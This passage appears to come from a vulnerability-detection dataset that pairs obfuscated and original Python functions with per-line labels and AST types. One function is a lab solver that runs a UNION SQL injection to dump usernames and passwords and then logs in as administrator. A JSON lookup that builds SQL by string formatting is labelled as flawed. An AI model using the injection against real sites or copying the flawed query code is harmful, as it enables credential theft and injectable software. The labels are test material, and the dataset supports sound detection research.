"conn = sqlite3.connect(CFG('dbname'))\n",
"return conn, conn.cursor()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"ImportFrom'",
"Import'",
"Import'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"return VAR_3\n"
] | [
"def getDjangoURLPatterns():...\n",
"\"\"\"docstring\"\"\"\n",
"return ROLE_MODELS_URL_PATTERNS\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_2(self, VAR_4):...\n",
"VAR_10 = VAR_4.find_all('p', not {'class': 'mw-empty-elt'}, recursive=False,\n limit=self.MAX_P_CHECKS)\n",
"for p in VAR_10:\n",
"VAR_7 = self.parse_tag(p)\n",
"VAR_11 = VAR_4.find('ul', recursive=False)\n",
"if VAR_7:\n",
"VAR_7 = self.parse_tag(VAR_11)\n",
"return VAR_7\n",
"return VAR_7\n"
] | [
"def parse_html(self, div):...\n",
"p_tags = div.find_all('p', not {'class': 'mw-empty-elt'}, recursive=False,\n limit=self.MAX_P_CHECKS)\n",
"for p in p_tags:\n",
"next_wiki = self.parse_tag(p)\n",
"ul = div.find('ul', recursive=False)\n",
"if next_wiki:\n",
"next_wiki = self.parse_tag(ul)\n",
"return next_wiki\n",
"return next_wiki\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"For",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Return'"
] |
[
"def FUNC_3(VAR_2, VAR_7, VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2[VAR_7] = \"username || ':' || password FROM users--\"\n",
"VAR_3['category'] = f\"{' '.join(VAR_2)}\"\n",
"VAR_12 = VAR_4.get(VAR_0, VAR_1=sqli)\n",
"VAR_13 = BeautifulSoup(VAR_12.text, 'html.parser')\n",
"VAR_14 = [up.contents[0] for up in VAR_13(['th'])]\n",
"VAR_15 = dict(up.split(':') for up in VAR_14)\n",
"VAR_0 = VAR_0.replace('/page', '/login')\n",
"VAR_12 = VAR_4.get(VAR_0)\n",
"VAR_13 = BeautifulSoup(VAR_12.text, 'html.parser')\n",
"VAR_16 = VAR_13.find('input', {'name': 'csrf'})['value']\n",
"VAR_17 = {'username': 'administrator', 'password': VAR_15['administrator'],\n 'csrf': VAR_16}\n",
"VAR_12 = VAR_4.post(VAR_0, data=payload)\n",
"return VAR_12\n"
] | [
"def sqli_union_lab_4(null, index, url):...\n",
"\"\"\"docstring\"\"\"\n",
"null[index] = \"username || ':' || password FROM users--\"\n",
"sqli['category'] = f\"{' '.join(null)}\"\n",
"lab4 = api_session.get(url, params=sqli)\n",
"html = BeautifulSoup(lab4.text, 'html.parser')\n",
"up_combo = [up.contents[0] for up in html(['th'])]\n",
"user_pass = dict(up.split(':') for up in up_combo)\n",
"url = url.replace('/page', '/login')\n",
"lab4 = api_session.get(url)\n",
"html = BeautifulSoup(lab4.text, 'html.parser')\n",
"csrfToken = html.find('input', {'name': 'csrf'})['value']\n",
"payload = {'username': 'administrator', 'password': user_pass[\n 'administrator'], 'csrf': csrfToken}\n",
"lab4 = api_session.post(url, data=payload)\n",
"return lab4\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_4(VAR_18, VAR_17, VAR_19):...\n",
"\"\"\"docstring\"\"\"\n",
"return keyworder.get_composite_keywords(VAR_18, VAR_17, VAR_19) or {}\n"
] | [
"def extract_composite_keywords(ckw_db, fulltext, skw_spans):...\n",
"\"\"\"docstring\"\"\"\n",
"return keyworder.get_composite_keywords(ckw_db, fulltext, skw_spans) or {}\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_14(self, VAR_21, VAR_11, **VAR_6):...\n",
"VAR_35 = [self.key_name]\n",
"VAR_36 = self.lhs\n",
"while isinstance(VAR_36, CLASS_6):\n",
"VAR_35.insert(0, VAR_36.key_name)\n",
"VAR_37, VAR_38 = VAR_21.compile(VAR_36)\n",
"VAR_36 = VAR_36.lhs\n",
"if len(VAR_35) > 1:\n",
"return '(%s %s %%s)' % (VAR_37, self.nested_operator), [VAR_35] + VAR_38\n",
"int(self.key_name)\n",
"VAR_40 = \"'%s'\" % self.key_name\n",
"VAR_40 = '%s' % self.key_name\n",
"return '(%s %s %s)' % (VAR_37, self.operator, VAR_40), VAR_38\n"
] | [
"def as_sql(self, compiler, connection, **kwargs):...\n",
"key_transforms = [self.key_name]\n",
"previous = self.lhs\n",
"while isinstance(previous, JsonKeyTransform):\n",
"key_transforms.insert(0, previous.key_name)\n",
"lhs, params = compiler.compile(previous)\n",
"previous = previous.lhs\n",
"if len(key_transforms) > 1:\n",
"return '(%s %s %%s)' % (lhs, self.nested_operator), [key_transforms] + params\n",
"int(self.key_name)\n",
"lookup = \"'%s'\" % self.key_name\n",
"lookup = '%s' % self.key_name\n",
"return '(%s %s %s)' % (lhs, self.operator, lookup), params\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4,
4,
4,
4,
4
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Expr'",
"Assign'",
"Assign'",
"Return'"
] |
[
"@frappe.whitelist()...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_3.pop('cmd', None)\n",
"VAR_3.pop('ignore_permissions', None)\n",
"if frappe.is_table(VAR_0):\n",
"if not VAR_3.get('parent'):\n",
"return CLASS_0(VAR_0).execute(None, *VAR_2, **kwargs)\n",
"frappe.flags.error_message = _('Parent is required to get child table data')\n",
"check_parent_permission(VAR_3.get('parent'), VAR_0)\n"
] | [
"@frappe.whitelist()...\n",
"\"\"\"docstring\"\"\"\n",
"kwargs.pop('cmd', None)\n",
"kwargs.pop('ignore_permissions', None)\n",
"if frappe.is_table(doctype):\n",
"if not kwargs.get('parent'):\n",
"return DatabaseQuery(doctype).execute(None, *args, **kwargs)\n",
"frappe.flags.error_message = _('Parent is required to get child table data')\n",
"check_parent_permission(kwargs.get('parent'), doctype)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Expr'",
"Expr'",
"Condition",
"Condition",
"Return'",
"Assign'",
"Expr'"
] |
[
"def __init__(self, VAR_3, VAR_4):...\n",
"self.tok = VAR_3\n",
"self.txt = VAR_4\n"
] | [
"def __init__(self, tok, txt):...\n",
"self.tok = tok\n",
"self.txt = txt\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'"
] |
[
"def FUNC_5(self):...\n",
"if self.redirected_to is None:\n",
"return None\n",
"VAR_14 = self.redirected_to.split('&')\n",
"if len(VAR_14) != 2:\n",
"VAR_0.warning(\"Redirected to an unexpected page: `%s'\", self.redirected_to)\n",
"VAR_21 = decrypt_number(VAR_14[-1])\n",
"VAR_0.warning(\"Unable to decrypt user test id from page: `%s'\", self.\n redirected_to)\n",
"return VAR_21\n",
"return None\n",
"return None\n"
] | [
"def get_user_test_id(self):...\n",
"if self.redirected_to is None:\n",
"return None\n",
"p = self.redirected_to.split('&')\n",
"if len(p) != 2:\n",
"logger.warning(\"Redirected to an unexpected page: `%s'\", self.redirected_to)\n",
"user_test_id = decrypt_number(p[-1])\n",
"logger.warning(\"Unable to decrypt user test id from page: `%s'\", self.\n redirected_to)\n",
"return user_test_id\n",
"return None\n",
"return None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Return'",
"Return'",
"Return'"
] |
[
"@VAR_1.route('/login')...\n",
"if 'return_url' in request.args:\n",
"VAR_18['return_url'] = request.args['return_url']\n",
"return render_template('login.html')\n"
] | [
"@app.route('/login')...\n",
"if 'return_url' in request.args:\n",
"session['return_url'] = request.args['return_url']\n",
"return render_template('login.html')\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_13(VAR_14):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_40.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in VAR_14])\n"
] | [
"def set_cuda_visible_devices(gpu_ids):...\n",
"\"\"\"docstring\"\"\"\n",
"os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in gpu_ids])\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'"
] |
[
"def FUNC_1(self, *VAR_4, **VAR_5):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_11 = self.REQUEST\n",
"VAR_12 = VAR_11.RESPONSE\n",
"VAR_12.setHeader('Content-Type', 'text/css')\n",
"VAR_13 = []\n",
"for stylesheet in self.getStylesheets():\n",
"return '\\n'.join(VAR_13)\n",
"VAR_24 = stylesheet(self)\n",
"VAR_24 = str(stylesheet)\n",
"VAR_13.append(\n '/* ######################################################################'\n )\n",
"VAR_13.append(' ### %s' % stylesheet.absolute_url())\n",
"VAR_13.append(\n ' ###################################################################### */'\n )\n",
"VAR_13.append(VAR_24)\n"
] | [
"def zmi_manage_css(self, *args, **kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"request = self.REQUEST\n",
"response = request.RESPONSE\n",
"response.setHeader('Content-Type', 'text/css')\n",
"css = []\n",
"for stylesheet in self.getStylesheets():\n",
"return '\\n'.join(css)\n",
"s = stylesheet(self)\n",
"s = str(stylesheet)\n",
"css.append(\n '/* ######################################################################'\n )\n",
"css.append(' ### %s' % stylesheet.absolute_url())\n",
"css.append(\n ' ###################################################################### */'\n )\n",
"css.append(s)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"For",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"@staticmethod...\n",
"VAR_14 = mongo.db.analysis.find(VAR_4, sort=[('_id', pymongo.DESCENDING)])\n",
"return [VAR_5 for VAR_5 in VAR_14]\n"
] | [
"@staticmethod...\n",
"cursor = mongo.db.analysis.find(filters, sort=[('_id', pymongo.DESCENDING)])\n",
"return [report for report in cursor]\n"
] | [
0,
0,
0
] | [
"Condition",
"Assign'",
"Return'"
] |
[
"@rest_utils.ajax()...\n",
"\"\"\"docstring\"\"\"\n",
"return api.nova.server_get(VAR_1, VAR_3).to_dict()\n"
] | [
"@rest_utils.ajax()...\n",
"\"\"\"docstring\"\"\"\n",
"return api.nova.server_get(request, server_id).to_dict()\n"
] | [
0,
0,
0
] | [
"Condition",
"Docstring",
"Return'"
] |
[
"def FUNC_2(VAR_0, VAR_1, VAR_2):...\n",
"VAR_9 = VAR_0.get_input('client', default='')\n",
"VAR_10 = VAR_0.get_input('tenant', default='')\n",
"if len(VAR_9) and len(VAR_10):\n",
"VAR_1['AZURE_CLIENT_ID'] = VAR_9\n",
"VAR_1['AZURE_SUBSCRIPTION_ID'] = VAR_0.get_input('subscription', default='')\n",
"VAR_1['AZURE_TENANT'] = VAR_10\n",
"VAR_1['AZURE_AD_USER'] = VAR_0.get_input('username', default='')\n",
"VAR_1['AZURE_SECRET'] = VAR_0.get_input('secret', default='')\n",
"VAR_1['AZURE_PASSWORD'] = VAR_0.get_input('password', default='')\n",
"VAR_1['AZURE_SUBSCRIPTION_ID'] = VAR_0.get_input('subscription', default='')\n",
"if VAR_0.has_input('cloud_environment'):\n",
"VAR_1['AZURE_CLOUD_ENVIRONMENT'] = VAR_0.get_input('cloud_environment')\n"
] | [
"def azure_rm(cred, env, private_data_dir):...\n",
"client = cred.get_input('client', default='')\n",
"tenant = cred.get_input('tenant', default='')\n",
"if len(client) and len(tenant):\n",
"env['AZURE_CLIENT_ID'] = client\n",
"env['AZURE_SUBSCRIPTION_ID'] = cred.get_input('subscription', default='')\n",
"env['AZURE_TENANT'] = tenant\n",
"env['AZURE_AD_USER'] = cred.get_input('username', default='')\n",
"env['AZURE_SECRET'] = cred.get_input('secret', default='')\n",
"env['AZURE_PASSWORD'] = cred.get_input('password', default='')\n",
"env['AZURE_SUBSCRIPTION_ID'] = cred.get_input('subscription', default='')\n",
"if cred.has_input('cloud_environment'):\n",
"env['AZURE_CLOUD_ENVIRONMENT'] = cred.get_input('cloud_environment')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'"
] |
[
"def FUNC_0(self, VAR_0='crimemap'):...\n",
"return pymysql.connect(host='localhost', user=dbconfig.db_user, password=\n dbconfig.db_password, db=database)\n"
] | [
"def connect(self, database='crimemap'):...\n",
"return pymysql.connect(host='localhost', user=dbconfig.db_user, password=\n dbconfig.db_password, db=database)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_12():...\n",
"VAR_9 = FUNC_0()\n",
"VAR_10 = VAR_9.cursor()\n",
"VAR_10.execute(' SELECT name, shame FROM people ORDER BY shame DESC LIMIT 5 ')\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_18 = VAR_10.fetchall()\n",
"VAR_2.debug('fetched top shame values')\n",
"return VAR_18\n"
] | [
"def shame_top():...\n",
"db = db_connect()\n",
"cursor = db.cursor()\n",
"cursor.execute(' SELECT name, shame FROM people ORDER BY shame DESC LIMIT 5 ')\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"leaders = cursor.fetchall()\n",
"logger.debug('fetched top shame values')\n",
"return leaders\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Return'"
] |
[
"@wraps(VAR_55)...\n",
"VAR_70['timer'] = CLASS_2(VAR_25)\n",
"return VAR_55(*VAR_69, **kwargs)\n"
] | [
"@wraps(func)...\n",
"kwargs['timer'] = Timer(name)\n",
"return func(*args, **kwargs)\n"
] | [
0,
0,
0
] | [
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self):...\n",
"self.run_test_case(self.scenario.delete_load_balancer())\n"
] | [
"def test_z_delete_load_balancer(self):...\n",
"self.run_test_case(self.scenario.delete_load_balancer())\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_9(self, VAR_12, VAR_15=None):...\n",
""
] | [
"def select(self, table, where=None):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_22(VAR_49, **VAR_18):...\n",
"if self._session_responses:\n",
"VAR_64 = self._session_responses[0]\n",
"VAR_18['allow_redirects'] = False\n",
"VAR_20.record_call(VAR_49, **kwargs)\n",
"return VAR_60(VAR_49, **kwargs)\n",
"return VAR_64() if hasattr(VAR_64, '__call__') else VAR_64\n"
] | [
"def _session_send(request, **kwargs):...\n",
"if self._session_responses:\n",
"current_response = self._session_responses[0]\n",
"kwargs['allow_redirects'] = False\n",
"cluster_api.record_call(request, **kwargs)\n",
"return session_send(request, **kwargs)\n",
"return current_response() if hasattr(current_response, '__call__'\n ) else current_response\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Return'"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.